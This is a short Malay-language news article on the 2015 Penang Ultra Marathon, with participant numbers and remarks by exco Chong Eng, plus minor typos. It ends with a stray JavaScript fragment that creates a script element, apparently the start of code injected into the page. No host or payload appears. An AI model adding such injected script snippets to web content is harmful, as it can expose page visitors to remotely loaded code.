Peserta ultra marathon berani cabar keupayaan diri – Exco

Gambar : AMANDA KHONG XIA LING

PADANG KOTA – Seramai 647 peserta dari 15 negara mengambil bahagian dalam kejohanan Ultra Marathon Pulau Pinang 2015 yang memperuntukkan seseorang peserta menamatkan cabaran larian masingmasing sejauh 100 kilometer (km), 84km dan 50km.

Exco Belia dan Sukan, Pembangunan Wanita, Keluarga dan Komuniti, Chong Eng berkata, setiap peserta yang mengambil bahagian adalah amat dikagumi kerana mereka berani mencabar keupayaan dan kemampuan diri.

“Acara ini sememangnya mampu mencabar mental dan fizikal seseorang ekoran jarak larian yang amat jauh dan juga mencabar.

“Ia bukan sesuatu yang biasa dan hanya golongan yang kental mampu melakukannya,’’ katanya ketika hadir pada Majlis Penyampaian Hadiah Kejohanan Ultra Marathon Pulau Pinang 2015 di sini baru-baru ini. Disokong oleh Kerajaan Negeri dan Majlis.

Bandaraya Pulau Pianang (MBPP), kejohanan tahun kedua tersebut merupakan anjuran badan-badan bukan kerajaan (NGO), BetterPenang dan syarikat pengeluar barangan sukan, Active Style.

Mengulas lanjut, Chong Eng berharap kejohanan Ultra Marathon Pulau Pinang terus memperoleh sokongan pelbagai pihak dalam menjadikan negeri ini sebagai sebuah ‘bandar’ sukan.

 var d=document;var s=d.createElement(‘script’);